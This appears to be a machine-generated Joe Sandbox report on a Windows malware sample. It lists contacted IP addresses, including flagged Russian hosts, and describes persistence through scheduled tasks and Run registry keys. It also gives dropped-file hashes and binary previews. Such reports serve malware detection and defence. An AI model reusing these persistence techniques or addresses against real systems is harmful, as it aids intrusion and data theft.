                                                                                                                                                                                                                                        		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                        142.250.105.84
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        64.233.176.95
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        52.182.143.212
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        193.233.132.234
                                                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                                                        		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                                                                                        147.45.47.93
                                                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                                                        		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                                                                                        142.251.15.94
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        172.217.215.94
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.9.94
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        104.21.67.211
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        77.221.151.47
                                                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                                                        		30968INFOBOX-ASInfoboxruAutonomousSystemRUfalse
                                                                                                                                                                                                                                        40.126.28.22
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        172.217.215.95
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        1.1.1.1
                                                                                                                                                                                                                                        		unknownAustralia
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        142.250.9.138
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        172.67.75.166
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        20.42.65.92
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        172.253.124.113
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        193.233.132.167
                                                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                                                        		2895FREE-NET-ASFREEnetEUtrue
                                                                                                                                                                                                                                        172.253.124.136
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.105.147
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        64.233.185.102
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        185.93.1.243
                                                                                                                                                                                                                                        		unknownCzech Republic
                                                                                                                                                                                                                                        		60068CDN77GBfalse
                                                                                                                                                                                                                                        185.172.128.19
                                                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                                                        		50916NADYMSS-ASRUfalse
                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                        		unknownReserved
                                                                                                                                                                                                                                        		unknownunknownfalse
                                                                                                                                                                                                                                        23.221.242.90
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8612TISCALI-ITfalse
                                                                                                                                                                                                                                        64.233.176.101
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse

                                                                                                                                                                                                                                        Private

                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        192.168.2.4
                                                                                                                                                                                                                                        192.168.2.6
                                                                                                                                                                                                                                        192.168.2.5
                                                                                                                                                                                                                                        127.0.0.1

                                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                                        Analysis ID:1430545
                                                                                                                                                                                                                                        Start date and time:2024-04-23 21:33:09 +02:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 13m 36s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:62
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:file.exe
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.phis.troj.spyw.evad.winEXE@134/170@0/32
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 60%
                                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                                        • Execution Graph export aborted for target explorta.exe, PID 1088 because there are no executed function
                                                                                                                                                                                                                                        • Execution Graph export aborted for target file.exe, PID 3200 because it is empty
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                                        • VT rate limit hit for: file.exe

                                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                        21:34:00Task SchedulerRun new task: explorta path: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        21:34:01API Interceptor222995x Sleep call for process: explorta.exe modified
                                                                                                                                                                                                                                        21:34:07API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                        21:34:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exe C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
                                                                                                                                                                                                                                        21:34:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2531414c80.exe C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        21:34:17Task SchedulerRun new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        21:34:17Task SchedulerRun new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        21:34:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                                                                        21:34:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exe C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
                                                                                                                                                                                                                                        21:34:41Task SchedulerRun new task: chrosha path: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        21:34:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2531414c80.exe C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        21:34:47API Interceptor4x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                        21:34:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                                                                        21:35:02API Interceptor762x Sleep call for process: chrosha.exe modified
                                                                                                                                                                                                                                        21:35:07API Interceptor6x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                                                                        21:35:17Task SchedulerRun new task: NewB.exe path: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                                        21:35:42AutostartRun: C:\Users\user\AppData\Local\Temp\1000150001\\2wERSk6O2SB7CCv97O9Iw4c8.bat
                                                                                                                                                                                                                                        21:36:00AutostartRun: C:\Users\user\AppData\Local\Temp\1000150001\\bJeGGRCnLC1DFc4D1K1Hs3V4.bat
                                                                                                                                                                                                                                        21:36:12AutostartRun: C:\Users\user\AppData\Local\Temp\1000150001\\Fzbnqj3QsKBst6EJon5cSKf7.bat
                                                                                                                                                                                                                                        21:36:23AutostartRun: C:\Users\user\AppData\Local\Temp\1000150001\\NewB.exe
                                                                                                                                                                                                                                        21:36:27Task SchedulerRun new task: Opera scheduled assistant Autoupdate 1713900985 path: C:\Users\user\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe s>--scheduledtask --productiscomponent --bypasslauncher --installdir="C:\Users\user\AppData\Local\Programs\Opera\assistant" --producttype=assistant $(Arg0)

                                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                        C:\ProgramData\MPGPH131\MPGPH131.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2397184
                                                                                                                                                                                                                                        Entropy (8bit):7.929142981070319
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:Kg69SebPPiKgYy9bOxGNLL9zDNgvELoEewJTJo4759x:Kg69SebiLbhZL92vlEewlJo47v
                                                                                                                                                                                                                                        MD5:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        SHA1:D8687917F5B9B3C5D9F51996CE2F5A1CC4A539B2
                                                                                                                                                                                                                                        SHA-256:90652AABBE1B148E1F7FCF58914E0654097B3542638890F23CB61B194411E1BE
                                                                                                                                                                                                                                        SHA-512:207A8F2DBF1E62F8B6E9E0256C3A7BEF5BDBC05F264BE160067D5C59A77D08E516A820D3860B9BE6D2B45193C4C8B614EE81AF933DDFF04A3FACE2AC473DE6E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L...^.%f...............'..............]...........@...........................^.......$...@.................................m0.......p.......................6].............................d6].................................@................... . .`..........................@....rsrc........p......................@....idata .....0......................@... ..*..@......................@...unpqzwpm..... D.....................@...glmqmaxs......].......$.............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                        Entropy (8bit):0.899132400402426
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:gJjJGtpTq2yv1AuNZRY3diu8iBVqFzil/:hpezNZQd58ixl/
                                                                                                                                                                                                                                        MD5:2C092F026E6494DBEC6124AEA0092BB5
                                                                                                                                                                                                                                        SHA1:8AD4642A39600B1B32BAD80AAA9B954E31B6877A
                                                                                                                                                                                                                                        SHA-256:38D800613AC164C4A1BD3D3A1CDF7B92748533FD55E2B8E49F7A234B167BF081
                                                                                                                                                                                                                                        SHA-512:94A4D3D97A6044B3F8539A276B239540560BAD419800E2254EC41D14356A07850F3930A8A6A6AC20AC44336B7E6A2EE131AD4451AF8E0B0954FCE3B46C2C7DFF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd119135a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                        Entropy (8bit):0.6586009097920882
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                        MD5:7FBEA6F2DB6EB0CA293D73E1BEE54813
                                                                                                                                                                                                                                        SHA1:2749F60E988E67E84C03308FDD06F4E093156F3C
                                                                                                                                                                                                                                        SHA-256:6C200214CC38F32F887AD1C816BE48EFD2BF79EE77A47DCEB9EF5F50781DBCC0
                                                                                                                                                                                                                                        SHA-512:B977EF313364DDDD68F9A4FE458CE6F413CC20AC7C20C149958D05A3A56FCCC88DF32FBADCC22B611C5CFA2D11F10A3E10F05EBA4CD1B4E108979C607EE5074F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...Z... ...............X\...;...{......................0.z..........{..."...|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................k.r.."...|.................{.@O."...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                        Entropy (8bit):0.08101258283727715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:I8YeVNpGGuAJkhvekl1S81ollrekGltll/SPj:XzVarxlJeJe3l
                                                                                                                                                                                                                                        MD5:1DB975B967DEEEA611BECB6B6D43CE90
                                                                                                                                                                                                                                        SHA1:EE5D5DED812BBA7BC211875E94122F3D15B08BD3
                                                                                                                                                                                                                                        SHA-256:A23D3623FE3C15647338907EC38EB544F27D90F1775914D6FCB0AF33775CB8EC
                                                                                                                                                                                                                                        SHA-512:69893F515C3972B7823C0A7E4B3FA2F997C2571602D6FBB0F8F1B570E127C5FA1C6BBF0E58406BD71B8B194BE51C7010ECA900F7B8FA0DE1BACC857B443DB977
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..j......................................;...{..."...|.......{...............{.......{...XL......{..................{.@O."...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2531414c80.exe_5e323fb4f1c666387d9cc1dee85f0b56b72b544_69a9f5ab_bbcf651c-2575-43b7-8cd7-ea1a1b4b92cf\Report.wer

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                        Entropy (8bit):1.088122560515295
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:Z0v9ueMPa0zMLAljL67Zr96nIzuiFKZ24IO8IN:Gv0eMPhzMLAljJIzuiFKY4IO8IN
                                                                                                                                                                                                                                        MD5:158A4185EAD490A84F895DD0FB3A0FE9
                                                                                                                                                                                                                                        SHA1:C2A76A023FF325D9D2E7972054F8E2FE0B91A46F
                                                                                                                                                                                                                                        SHA-256:F29A91344D659B8939388FC5EF4F63973EDA7D29C4E1A6D44548852EAA847DC4
                                                                                                                                                                                                                                        SHA-512:C11B4B37D7413A9980FA88BE295F873FE13CD9F403874A5D7D5903041B8D2DA7D800A63811B8F6E42ED965C6CB890EE48FD43078D484FAB7D946F086DE2B5F58
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.7.4.4.7.2.3.5.9.4.7.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.7.4.4.7.3.7.0.6.0.6.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.c.f.6.5.1.c.-.2.5.7.5.-.4.3.b.7.-.8.c.d.7.-.e.a.1.a.1.b.4.b.9.2.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.a.9.c.d.8.1.-.5.d.5.3.-.4.7.e.e.-.b.2.4.d.-.9.f.e.7.4.f.3.8.2.d.3.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.5.3.1.4.1.4.c.8.0...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.r.o.s.s.D.e.v.i.c.e.S.e.t.t.i.n.g.s.H.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.8.4.-.0.0.0.1.-.0.0.1.4.-.2.b.b.7.-.9.7.3.6.b.5.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.6.7.a.b.c.f.8.d.6.c.2.5.2.9.7.e.d.9.7.2.3.e.f.1.6.c.3.8.f.3.6.0.0.0.0.0.9.1.0.!.0.0.0.0.d.8.6.8.7.9.1.7.f.5.b.9.b.3.c.5.d.9.f.5.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MPGPH131.exe_12d0986cc18289ef8901cad6b43de906d388da1_d1a40e08_d80b7010-35f5-4a11-a4b9-1160bd036eec\Report.wer

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                        Entropy (8bit):1.07521337274158
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:PZIl6i9NQzu78DPO09uPp6E6jjL67Zr9KWJzuiFKZ24IO826t:C6iUqeP19uPMjwJzuiFKY4IO8p
                                                                                                                                                                                                                                        MD5:1DEE0AA8714728F7DFD82BE4128BBADB
                                                                                                                                                                                                                                        SHA1:22998F2B3BD3101EA46A815B91CC443D33ACAFEC
                                                                                                                                                                                                                                        SHA-256:85603CD98D7D1CA87F46476BD07D2C5ECC77DB09DBFF67BE3E3C2DF37C50D4EF
                                                                                                                                                                                                                                        SHA-512:3EF0767C5A130BA4D253869675BEC1E60BD768B0F6477FF226597F09184D7C1118A4AE692AC91B6780FC312003E20691C4B3A7C2E151B39F462D468BF162E389
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.7.4.4.7.8.9.7.0.7.4.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.7.4.4.8.3.0.9.9.4.1.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.0.b.7.0.1.0.-.3.5.f.5.-.4.a.1.1.-.a.4.b.9.-.1.1.6.0.b.d.0.3.6.e.e.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.b.f.8.b.6.0.-.0.7.f.7.-.4.e.4.f.-.8.9.6.1.-.8.f.9.c.1.c.f.d.f.2.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.P.G.P.H.1.3.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.r.o.s.s.D.e.v.i.c.e.S.e.t.t.i.n.g.s.H.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.c.-.0.0.0.1.-.0.0.1.4.-.8.d.e.6.-.2.5.3.b.b.5.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.6.7.a.b.c.f.8.d.6.c.2.5.2.9.7.e.d.9.7.2.3.e.f.1.6.c.3.8.f.3.6.0.0.0.0.0.9.1.0.!.0.0.0.0.d.8.6.8.7.9.1.7.f.5.b.9.b.3.c.5.d.9.f.5.1.9.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MPGPH131.exe_c6c137ad26261ffbf179af25b12dcff5c58b13_d1a40e08_61a248c3-481b-4468-af45-0268f8e5e2de\Report.wer

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                        Entropy (8bit):1.072702321154268
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:xZlZ9NQzTO8DPt/005Dce6E6jjbdnZrxLZOzuiFKZ24IO826t:tZU6ePts05DcxjXOzuiFKY4IO8p
                                                                                                                                                                                                                                        MD5:11723CAE8574FF152C566170DCB4B4D7
                                                                                                                                                                                                                                        SHA1:F031E06FDA282EED1D10A9B54780E14F83DD247B
                                                                                                                                                                                                                                        SHA-256:2A4C245A32FB810E2E71E6FDCE3C8F861EF588C21EEC1AA2D87D6672951BC38D
                                                                                                                                                                                                                                        SHA-512:F602C2CD561314BD030AA01E3C8E58895C0C7F68CCB33AC583A3D73290BF4B2BB648C61A9F108818C5FB3A8B371C11D6DE3F024632F541082446E2EADB1463CB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.7.4.4.7.8.7.4.8.8.1.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.7.4.4.7.9.8.6.2.2.6.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.a.2.4.8.c.3.-.4.8.1.b.-.4.4.6.8.-.a.f.4.5.-.0.2.6.8.f.8.e.5.e.2.d.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.8.2.6.5.b.6.-.d.f.4.e.-.4.7.c.c.-.b.a.5.b.-.2.b.5.3.0.2.e.6.a.d.4.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.P.G.P.H.1.3.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.r.o.s.s.D.e.v.i.c.e.S.e.t.t.i.n.g.s.H.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.1.8.-.0.0.0.1.-.0.0.1.4.-.0.4.d.3.-.4.7.3.b.b.5.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.6.7.a.b.c.f.8.d.6.c.2.5.2.9.7.e.d.9.7.2.3.e.f.1.6.c.3.8.f.3.6.0.0.0.0.0.9.1.0.!.0.0.0.0.d.8.6.8.7.9.1.7.f.5.b.9.b.3.c.5.d.9.f.5.1.9.

                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_swiiiii.exe_4644a13ebcdb6e10e65a72b8ec8bc0b0ff32d1fa_6563360f_1188cd97-5eaf-4e3e-b2ca-e3777ca54d21\Report.wer

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                        Entropy (8bit):0.9268706521055753
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:T+GeSAX6c0BU/AJFaGszuiFKZ24IO8Kd:7VAX6XBU/AJFadzuiFKY4IO8Kd
                                                                                                                                                                                                                                        MD5:C14DFA78A896690CBF046D80654C439B
                                                                                                                                                                                                                                        SHA1:837EC784DD12DE9E5F108CD11FDB0A693A20F81F
